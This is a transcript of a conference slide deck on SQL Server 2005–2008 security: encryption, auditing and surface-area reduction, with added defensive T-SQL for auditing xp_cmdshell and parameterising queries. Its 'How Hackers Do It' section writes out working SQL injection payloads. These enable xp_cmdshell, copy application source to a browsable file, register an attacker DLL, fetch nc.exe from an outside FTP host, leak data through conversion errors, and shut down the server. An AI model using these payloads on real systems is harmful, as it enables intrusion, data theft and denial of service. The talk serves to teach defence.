sql server security by clement arul


Upload: microsoft-techdays-apac

Post on 29-Nov-2014


TRANSCRIPT

SQL SERVER SECURITY
Clement Arul, CTO, Mega Fortris

AGENDA

I'm a . . .

BUSINESS CHALLENGES

BUSINESS NEEDS

DB VULNERABILITIES

SQL SERVER 2005 SECURITY Recap

SQL SERVER 2008 SECURITY

Extensible Key Management (EKM)

Transparent Data Encryption (TDE)

Advantages of using TDE

CONTROL ACCESS

Authentication Enhancements

Authentication Features

ENSURE COMPLIANCE

Policy-Based Management

Reduced Surface Area Configuration

SQL SERVER AUDIT

How Hackers Do It?

SQL INJECTION BASIC TRICKS

Extended Stored Procedures

Enabling xp_cmdshell in SQL Server 2005 / 2008 / R2

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Note : By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005 / 2008 / R2. Enabling them needs the ALTER SETTINGS permission (held by the sysadmin and serveradmin roles), so "disabled by default" protects nothing if the injected statements run under a login with those rights, for instance an application that connects as sa.
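What the note above leaves implicit is how to tell whether these options are on, how to turn them back off, and how to see who is using them. The T-SQL below is an added example written for this page, not part of the talk: it reads sys.configurations for the usual surface-area switches, disables xp_cmdshell again, and puts a SQL Server Audit on every EXECUTE of it. The audit name Audit_XpCmdShell, the specification name and the folder C:\SQLAudit\ are assumptions; SQL Server Audit itself requires Enterprise Edition on 2008 and 2008 R2.

```sql
-- Added example (not from the talk). Audit names and C:\SQLAudit\ are assumptions.

-- 1. Which surface-area options are live? value_in_use = 1 means enabled now.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'Ole Automation Procedures',
                'Ad Hoc Distributed Queries', 'clr enabled',
                'remote access', 'SMO and DMO XPs');

-- 2. Turn xp_cmdshell off again (ALTER SETTINGS permission required) and hide
--    the advanced options once more.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Record every EXECUTE of xp_cmdshell, so that an attacker who re-enables it
--    leaves a trail. xp_cmdshell lives in master, so the database audit
--    specification is created there.
USE master;
GO
CREATE SERVER AUDIT Audit_XpCmdShell
    TO FILE (FILEPATH = 'C:\SQLAudit\')   -- assumption: folder exists, service account can write
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
CREATE DATABASE AUDIT SPECIFICATION Audit_XpCmdShell_Exec
    FOR SERVER AUDIT Audit_XpCmdShell
    ADD (EXECUTE ON OBJECT::sys.xp_cmdshell BY public)
    WITH (STATE = ON);
GO
ALTER SERVER AUDIT Audit_XpCmdShell WITH (STATE = ON);
GO

-- 4. Read the trail: who ran what, from which database, and whether it worked.
SELECT event_time, server_principal_name, database_name,
       object_name, statement, succeeded
FROM   sys.fn_get_audit_file('C:\SQLAudit\*', DEFAULT, DEFAULT)
ORDER BY event_time DESC;
```

For a sysadmin caller xp_cmdshell runs the command as the SQL Server service account, so the Windows rights of that account, not anything inside SQL Server, bound what the file-writing and FTP examples further down can reach; running the service under a low-privilege account is the second half of this control.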

Example 1 :

To execute a shell command that writes the output of the command dir c:\inetpub into a browseable file, assuming that the web server and the DB server reside on the same host:

exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--

Alternatively, we can use sp_makewebtask:

exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--

Note that sp_makewebtask (the Web Assistant procedures) is disabled by default in SQL Server 2005 and no longer exists in SQL Server 2008, so this variant only applies to older instances.

Example 2 : The SQL Server built-in function db_name() can be used to trigger a conversion error whose message returns the name of the current database:

/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())

Example 3 : Obtaining the application's source code by copying it to a file the web server will serve as plain text:

a' ; exec master.dbo.xp_cmdshell 'copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
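Example 2 works because the WHERE clause is assembled by string concatenation and the forced conversion error carries a value out through the application's error page. The T-SQL below reproduces that on a throwaway table and then shows the parameterised form that closes the hole; it is an added example for this page, not code from the talk or from the controlboard.asp application, and the table dbo.ControlBoard, its columns and the two procedure names are assumptions.

```sql
-- Added example (not from the talk). Table, columns and procedure names are
-- assumptions for illustration.
CREATE TABLE dbo.ControlBoard (boardID int, itemnum int, title nvarchar(100));
INSERT INTO dbo.ControlBoard VALUES (2, 1, N'Welcome');
INSERT INTO dbo.ControlBoard VALUES (2, 2, N'Second item');
GO

-- Vulnerable pattern: the two URL parameters are pasted into the statement
-- text, which is what lets "1 AND 1=CONVERT(int, db_name())" ride along.
CREATE PROCEDURE dbo.GetItem_Vulnerable
    @boardID nvarchar(100), @itemnum nvarchar(100)
AS
    DECLARE @sql nvarchar(max);
    SET @sql = N'SELECT title FROM dbo.ControlBoard WHERE boardID = ' + @boardID
             + N' AND itemnum = ' + @itemnum;
    EXEC (@sql);
GO

-- The payload from Example 2. The statement parses, the comparison forces the
-- CONVERT to run, and the batch fails with (SQL Server 2005 and later):
--   Conversion failed when converting the nvarchar value '<dbname>' to data type int.
-- An application that echoes the error has just disclosed its database name.
EXEC dbo.GetItem_Vulnerable N'2', N'1 AND 1=CONVERT(int, db_name())';

-- Same trick generalised: any single value the login can SELECT comes out the
-- same way, one per request (here the alphabetically first user table).
EXEC dbo.GetItem_Vulnerable N'2',
    N'1 AND 1=CONVERT(int, (SELECT TOP 1 name FROM sys.objects WHERE type = ''U'' ORDER BY name))';

-- Fixed pattern: sp_executesql with typed parameters. The values travel as
-- parameters, never as statement text, so the payload above is rejected as a
-- bad int before any query runs and the error names nothing from the database.
CREATE PROCEDURE dbo.GetItem_Safe @boardID int, @itemnum int
AS
    EXEC sp_executesql
        N'SELECT title FROM dbo.ControlBoard WHERE boardID = @b AND itemnum = @i',
        N'@b int, @i int',
        @b = @boardID, @i = @itemnum;
GO
EXEC dbo.GetItem_Safe 2, 1;
```

The same fix applies one layer up: the ASP page should pass boardID and itemnum as typed command parameters rather than building the query string, and it should log database errors instead of rendering them, since the error text is the channel this whole example depends on.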

Example 4 : Register a DLL that is already on the server as a new extended stored procedure. Extended procedures run native code inside the SQL Server process, so this is effectively arbitrary code execution (sp_addextendedproc needs sysadmin; c:\temp\x.dll stands for the attacker's own DLL):

exec sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
exec xp_webserver

Example 5 : Start and stop Windows services with xp_servicecontrol, which takes the action (START or STOP) and the service name.

Example 6 : Upload executables. Once xp_cmdshell is enabled, uploading becomes a cakewalk. If the target can make outbound FTP connections, inject the following queries, which build an ftp script one line at a time and then run it (the USER and PASS lines carry the account on the attacker's FTP server):

exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--

Tools: Windows: Bobcat; Unix: Sqlninja

';shutdown --

The SHUTDOWN statement stops the SQL Server instance; injected under a login with sysadmin or serveradmin rights it is a one-line denial of service.

Q&A

References

Microsoft Security Development Lifecycle: http://www.microsoft.com/sdl

Security Configuration Benchmark for SQL Server 2005, 2008 and R2 (CIS): http://cisecurity.org/

The Open Web Application Security Project (OWASP): http://www.owasp.org

http://www.innov8orz.com/blog